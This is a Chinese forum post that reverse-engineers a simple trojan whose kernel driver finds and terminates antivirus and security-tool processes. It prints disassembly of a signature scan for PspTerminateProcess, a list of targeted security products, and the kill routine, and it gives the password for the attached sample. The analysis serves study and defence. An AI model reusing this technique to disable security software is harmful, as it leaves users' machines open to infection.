昨天发了一篇被判定为YJ贴了。。,希望这篇不会。。。
马比较简单,适合新手。
先说一下行为:exe文件会释放Pcix32.sys amd32_.sys atax32.sys三个文件,但是后两个其实只是地一个的拷贝。sys文件负责监控各种杀毒软件和安全工具的启动,一旦发现,马上kill。
1。exe行为。
这里只写思路,详细请参考idb文件和自己跟,嘎嘎。
首先获取系统drivers目录,然后释放Pcix32.sys到这个目录下,期间拷贝各种副本。
还有,exe会检测是否有还原精灵,有的话会做相应处理,不过本人太懒。。懒得搭环境,这部分有兴趣的跟一下吧:)
如果没有还原精灵的话,就加载驱动。
最后有一个注入的行为,也没仔细跟:D
2。sys
这个是感兴趣的,贴代码:
代码:
.text:00010B34 lea eax, [ebp+SystemInformation] .text:00010B37 push eax ; ReturnLength .text:00010B38 push 0 ; SystemInformationLength .text:00010B3A push eax ; SystemInformation .text:00010B3B push 0Bh ; SystemInformationClass .text:00010B3D mov edi, ds:__imp_ZwQuerySystemInformation .text:00010B43 call edi ; __imp_ZwQuerySystemInformation .text:00010B45 push [ebp+SystemInformation] ; NumberOfBytes .text:00010B48 push 1 ; PoolType .text:00010B4A call ds:ExAllocatePool
代码:
text:00010B5A push 0 ; ReturnLength .text:00010B5C push [ebp+SystemInformation] ; SystemInformationLength .text:00010B5F push esi ; SystemInformation .text:00010B60 push 0Bh ; SystemInformationClass .text:00010B62 call edi ; __imp_ZwQuerySystemInformation .text:00010B64 test eax, eax .text:00010B66 jl short loc_10BDE .text:00010B68 mov ebx, [esi+0Ch] .text:00010B6B mov edi, [esi+10h] .text:00010B6E add edi, ebx .text:00010B70 push 0 ; Tag .text:00010B72 push esi ; P .text:00010B73 call ds:ExFreePoolWithTag .text:00010B79 mov esi, ebx .text:00010B7B .text:00010B7B loc_10B7B: ; CODE XREF: sub_10B28+BFj .text:00010B7B cmp esi, edi .text:00010B7D ja short loc_10BDE .text:00010B7F push esi ; VirtualAddress .text:00010B80 call ds:MmIsAddressValid .text:00010B86 test al, al .text:00010B88 jz short loc_10BE6 .text:00010B8A lea ebx, [esi+4] .text:00010B8D push ebx ; VirtualAddress .text:00010B8E call ds:MmIsAddressValid;测试地址是否可用,防止BSOD。。。 .text:00010B94 test al, al .text:00010B96 jz short loc_10BE6 .text:00010B98 mov eax, 8B55FF8Bh:google一下这个值吧,发现是PspTerminateProcess .text:00010B9D cmp [esi], eax .text:00010B9F jnz short loc_10BE6 .text:00010BA1 mov eax, 0CEC83ECh .text:00010BA6 cmp [ebx], eax .text:00010BA8 jnz short loc_10BE6 .text:00010BAA mov eax, 0FFF84D83h .text:00010BAF cmp [esi+8], eax .text:00010BB2 jnz short loc_10BE6 .text:00010BB4 mov eax, 7D8B5756h .text:00010BB9 cmp [esi+0Ch], eax .text:00010BBC jnz short loc_10BE6 .text:00010BBE and [ebp+ms_exc.disabled], 0 .text:00010BC2 mov [ebp+var_20], esi .text:00010BC5 mov [ebp+ms_exc.disabled], 0FFFFFFFEh .text:00010BCC mov eax, esi;保存函数地址
代码:
.text:00010A40 call _GetPspTerminateProcessAddress .text:00010A45 mov PspTerminateProcess, eax .text:00010A4A test eax, eax .text:00010A4C jnz short loc_10A8F .text:00010A4E call sub_10568
代码:
sub_10568 proc near ; CODE XREF: sub_10A30+1Ep .text:00010568 push offset aPsterminatesys ; "PsTerminateSystemThread" .text:0001056D push sysInfo .text:00010573 call sub_10486 .text:00010578 xor ecx, ecx .text:0001057A .text:0001057A loc_1057A: ; CODE XREF: sub_10568+28j .text:0001057A cmp byte ptr [eax], 0FFh;0xFF7508,即psterminateprocess .text:0001057D jnz short loc_1058B .text:0001057F cmp byte ptr [eax+1], 75h .text:00010583 jnz short loc_1058B .text:00010585 cmp byte ptr [eax+2], 8 .text:00010589 jz short loc_10595 。。。。 .text:00010595 loc_10595: ; CODE XREF: sub_10568+21j .text:00010595 add eax, 5 .text:00010598 mov ecx, [eax] .text:0001059A lea eax, [ecx+eax+4] .text:0001059E retn
下面是find and kill函数,负责干坏事的元凶:
代码:
.text:00010CEC mov edi, edi .text:00010CEE push ebp .text:00010CEF mov ebp, esp .text:00010CF1 sub esp, 6A4h .text:00010CF7 and [ebp+var_C], 0 .text:00010CFB push ebx .text:00010CFC push esi .text:00010CFD push edi .text:00010CFE mov esi, 0FFFFh .text:00010D03 push esi ; NumberOfBytes .text:00010D04 mov ebx, offset aKvmonxp_exe ; "KVMonXp.exe" .text:00010D09 push 1 ; PoolType .text:00010D0B mov [ebp+SourceString], offset aNod32krn_exe ; "nod32krn.exe" .text:00010D15 mov [ebp+var_C0], offset aEgui_exe ; "egui.exe" .text:00010D1F mov [ebp+var_BC], offset aEkrn_exe ; "ekrn.exe" .text:00010D29 mov [ebp+var_B8], offset a360tray_exe ; "360tray.exe" .text:00010D33 mov [ebp+var_B4], offset a360safe_exe ; "360Safe.exe" .text:00010D3D mov [ebp+var_B0], offset aSafeboxtray_ex ; "safeboxTray.exe" .text:00010D47 mov [ebp+var_AC], offset a360safebox_exe ; "360safebox.exe" .text:00010D51 mov [ebp+var_A8], offset a360sd_exe ; "360sd.exe" .text:00010D5B mov [ebp+var_A4], offset aZhudongfangyu_ ; "ZhuDongFangYu.exe" .text:00010D65 mov [ebp+var_A0], offset a360rp_exe ; "360rp.exe" .text:00010D6F mov [ebp+var_9C], offset a360sdupd_exe ; "360sdupd.exe" .text:00010D79 mov [ebp+var_98], offset a360rps_exe ; "360rps.exe" .text:00010D83 mov [ebp+var_94], offset a3_0 ; "3" .text:00010D8D mov [ebp+var_90], offset aO ; "O" .text:00010D97 mov [ebp+var_8C], offset asc_11BDE ; "L" .text:00010DA1 mov [ebp+var_88], offset aK_8 ; "K" .text:00010DAB mov [ebp+var_84], offset aK_7 ; "k" .text:00010DB5 mov [ebp+var_80], offset aK_6 ; "k" .text:00010DBC mov [ebp+var_7C], offset aK_5 ; "k" .text:00010DC3 mov [ebp+var_78], offset aK_4 ; "k" .text:00010DCA mov [ebp+var_74], offset aU ; "u" .text:00010DD1 mov [ebp+var_70], offset aKxescore_exe ; "kxescore.exe" .text:00010DD8 mov [ebp+var_6C], offset aKxetray_exe ; "kxetray.exe" .text:00010DDF mov [ebp+var_68], offset aK_3 ; "K" .text:00010DE6 mov [ebp+var_64], offset aK ; "K" .text:00010DED mov [ebp+var_60], offset aGuiyingfix_exe ; "guiyingfix.exe" .text:00010DF4 mov [ebp+var_5C], offset aRavmond_exe ; "RavMonD.exe" .text:00010DFB mov [ebp+var_58], offset aR_3 ; "R" .text:00010E02 mov [ebp+var_54], offset aR ; "R" .text:00010E09 mov [ebp+var_50], offset aRegguide_exe ; "RegGuide.exe" .text:00010E10 mov [ebp+var_4C], offset aR_0 ; "R" .text:00010E17 mov [ebp+var_48], offset aRscopy_exe ; "RsCopy.exe" .text:00010E1E mov [ebp+var_44], offset aRav_exe ; "Rav.exe" .text:00010E25 mov [ebp+var_40], offset aKvsrvxp_exe ; "KVSrvXP.exe" .text:00010E2C mov [ebp+var_3C], offset word_119F2 .text:00010E33 mov [ebp+var_38], ebx .text:00010E36 mov [ebp+var_34], offset aA ; "a" .text:00010E3D mov [ebp+var_30], offset aIcesword_exe ; "IceSword.exe" .text:00010E44 mov [ebp+var_2C], offset aS_0 ; "S" .text:00010E4B mov [ebp+var_28], offset aR_1 ; "r" .text:00010E52 mov [ebp+var_24], offset aKnownsvr_exe ; "knownsvr.exe" .text:00010E59 mov [ebp+var_20], offset aR_2 ; "r" .text:00010E60 mov [ebp+var_1C], offset aKnsdtray_exe ; "knsdtray.exe" .text:00010E67 mov [ebp+var_18], offset aK_2 ; "k" .text:00010E6E mov [ebp+var_14], offset aK_1 ; "k" .text:00010E75 mov [ebp+var_10], offset aK_0 ; "k" .text:00010E7C call ds:ExAllocatePool .text:00010E82 mov edi, eax .text:00010E84 mov [ebp+P], edi .text:00010E87 test edi, edi .text:00010E89 jz loc_10FA5 .text:00010E8F push offset Format ; "enter findprocessandkill\n" .text:00010E94 call DbgPrint .text:00010E99 pop ecx .text:00010E9A lea eax, [ebp+ReturnLength] .text:00010E9D push eax ; ReturnLength .text:00010E9E push esi ; SystemInformationLength .text:00010E9F push edi ; SystemInformation .text:00010EA0 push 5 ; SystemInformationClass .text:00010EA2 call ds:__imp_ZwQuerySystemInformation .text:00010EA8 mov esi, edi .text:00010EAA .text:00010EAA loc_10EAA: ; CODE XREF: _FindAddKillProcess+2A8j .text:00010EAA add esi, [esi] .text:00010EAC xor eax, eax .text:00010EAE lea edi, [esi+38h] .text:00010EB1 cmp [edi], ax .text:00010EB4 jz loc_10F91 .text:00010EBA mov [ebp+ReturnLength], eax .text:00010EBD .text:00010EBD loc_10EBD: ; CODE XREF: _FindAddKillProcess+29Fj .text:00010EBD push [ebp+eax*4+SourceString] ; SourceString .text:00010EC4 lea eax, [ebp+eax*8+DestinationString] .text:00010ECB push eax ; DestinationString .text:00010ECC call ds:RtlInitUnicodeString .text:00010ED2 mov eax, [ebp+ReturnLength] .text:00010ED5 push 1 ; CaseInSensitive .text:00010ED7 lea eax, [ebp+eax*8+DestinationString] .text:00010EDE push eax ; String2 .text:00010EDF push edi ; String1 .text:00010EE0 call ds:RtlCompareUnicodeString .text:00010EE6 test eax, eax .text:00010EE8 jnz loc_10F7C .text:00010EEE mov eax, [ebp+ReturnLength] .text:00010EF1 push offset aKvsrvxp_exe ; "KVSrvXP.exe" .text:00010EF6 push [ebp+eax*4+SourceString] ; wchar_t * .text:00010EFD call ds:_wcsicmp .text:00010F03 pop ecx .text:00010F04 pop ecx .text:00010F05 test eax, eax .text:00010F07 jz short loc_10F75 .text:00010F09 mov eax, [ebp+ReturnLength] .text:00010F0C push offset word_119F2 ; wchar_t * .text:00010F11 push [ebp+eax*4+SourceString] ; wchar_t * .text:00010F18 call ds:_wcsicmp .text:00010F1E pop ecx .text:00010F1F pop ecx .text:00010F20 test eax, eax .text:00010F22 jz short loc_10F75 .text:00010F24 mov eax, [ebp+ReturnLength] .text:00010F27 push ebx ; wchar_t * .text:00010F28 push [ebp+eax*4+SourceString] ; wchar_t * .text:00010F2F call ds:_wcsicmp .text:00010F35 pop ecx .text:00010F36 pop ecx .text:00010F37 test eax, eax .text:00010F39 jz short loc_10F75 .text:00010F3B mov eax, [ebp+ReturnLength] .text:00010F3E push [ebp+eax*4+SourceString] .text:00010F45 push offset aFindProcesssWs ; "Find Processs: %ws\n" .text:00010F4A call DbgPrint .text:00010F4F pop ecx .text:00010F50 pop ecx .text:00010F51 push dword ptr [esi+44h] ; PEPROCESS .text:00010F54 call KillProcess .text:00010F59 test eax, eax .text:00010F5B jl short loc_10F7C .text:00010F5D mov eax, [ebp+ReturnLength] .text:00010F60 push [ebp+eax*4+SourceString] .text:00010F67 push offset aKillProcesssWs ; "Kill Processs: %ws OK!\n" .text:00010F6C call DbgPrint .text:00010F71 pop ecx .text:00010F72 pop ecx .text:00010F73 jmp short loc_10F7C .text:00010F75 ; --------------------------------------------------------------------------- .text:00010F75 .text:00010F75 loc_10F75: ; CODE XREF: _FindAddKillProcess+21Bj .text:00010F75 ; _FindAddKillProcess+236j ... .text:00010F75 mov byte_1212C, 1 .text:00010F7C .text:00010F7C loc_10F7C: ; CODE XREF: _FindAddKillProcess+1FCj .text:00010F7C ; _FindAddKillProcess+26Fj ... .text:00010F7C mov eax, [ebp+ReturnLength] .text:00010F7F inc eax .text:00010F80 cmp [ebp+eax*4+SourceString], 0 .text:00010F88 mov [ebp+ReturnLength], eax .text:00010F8B jnz loc_10EBD .text:00010F91 .text:00010F91 loc_10F91: ; CODE XREF: _FindAddKillProcess+1C8j .text:00010F91 cmp dword ptr [esi], 0 .text:00010F94 jnz loc_10EAA .text:00010F9A push 0 ; Tag .text:00010F9C push [ebp+P] ; P .text:00010F9F call ds:ExFreePoolWithTag .text:00010FA5 .text:00010FA5 loc_10FA5: ; CODE XREF: _FindAddKillProcess+19Dj .text:00010FA5 pop edi .text:00010FA6 pop esi .text:00010FA7 pop ebx .text:00010FA8 leave .text:00010FA9 retn
呵呵,看一下怎么kill的吧:
代码:
KillProcess proc near ; CODE XREF: _FindAddKillProcess+268p .text:00010CB0 .text:00010CB0 PEPROCESS = dword ptr 8 .text:00010CB0 .text:00010CB0 mov edi, edi .text:00010CB2 push ebp .text:00010CB3 mov ebp, esp .text:00010CB5 lea eax, [ebp+PEPROCESS] .text:00010CB8 push eax .text:00010CB9 push [ebp+PEPROCESS] .text:00010CBC call PsLookupProcessByProcessId .text:00010CC1 test eax, eax .text:00010CC3 jl short loc_10CCE .text:00010CC5 mov ecx, [ebp+PEPROCESS] ; Object .text:00010CC8 call ds:ObfDereferenceObject .text:00010CCE .text:00010CCE loc_10CCE: ; CODE XREF: KillProcess+13j .text:00010CCE push [ebp+PEPROCESS] .text:00010CD1 call sub_10C4E .text:00010CD6 test eax, eax .text:00010CD8 jl short loc_10CDE .text:00010CDA xor eax, eax .text:00010CDC jmp short loc_10CE3 .text:00010CDE ; --------------------------------------------------------------------------- .text:00010CDE .text:00010CDE loc_10CDE: ; CODE XREF: KillProcess+28j .text:00010CDE mov eax, 0C0000001h .text:00010CE3 .text:00010CE3 loc_10CE3: ; CODE XREF: KillProcess+2Cj .text:00010CE3 pop ebp .text:00010CE4 retn 4 .text:00010CE4 KillProcess endp
代码:
.text:00010C50 push offset unk_12088 .text:00010C55 call __SEH_prolog4 .text:00010C5A xor edi, edi .text:00010C5C mov [ebp+var_1C], edi .text:00010C5F mov [ebp+ms_exc.disabled], edi .text:00010C62 push edi ; Object .text:00010C63 .text:00010C63 loc_10C63: ; CODE XREF: sub_10C4E+32j .text:00010C63 push [ebp+PEPROCESS] ; PEPROCESS .text:00010C66 call sub_10BEE .text:00010C6B mov esi, eax .text:00010C6D cmp esi, edi .text:00010C6F jz short loc_10C99 .text:00010C71 mov [ebp+var_1C], edi .text:00010C74 push edi .text:00010C75 push esi .text:00010C76 call PspTerminateProcess .text:00010C7C mov [ebp+var_1C], eax .text:00010C7F push esi .text:00010C80 jmp short loc_10C63 .text:00010C82 ; --------------------------------------------------------------------------- .text:00010C82 .text:00010C82 loc_10C82: ; DATA XREF: .rdata:0001209Co .text:00010C82 mov eax, [ebp+ms_exc.exc_ptr] .text:00010C85 mov eax, [eax] .text:00010C87 mov eax, [eax] .text:00010C89 mov [ebp+var_20], eax .text:00010C8C xor eax, eax .text:00010C8E inc eax .text:00010C8F retn .text:00010C90 ; --------------------------------------------------------------------------- .text:00010C90 .text:00010C90 loc_10C90: ; DATA XREF: .rdata:000120A0o .text:00010C90 mov esp, [ebp+ms_exc.old_esp] .text:00010C93 mov eax, [ebp+var_20] .text:00010C96 mov [ebp+var_1C], eax .text:00010C99 .text:00010C99 loc_10C99: ; CODE XREF: sub_10C4E+21j .text:00010C99 mov [ebp+ms_exc.disabled], 0FFFFFFFEh .text:00010CA0 mov eax, [ebp+var_1C] .text:00010CA3 call __SEH_epilog4 .text:00010CA8 retn 4 .text:00010CA8 sub_10C4E endp
解压密码:pediy
Virus.rar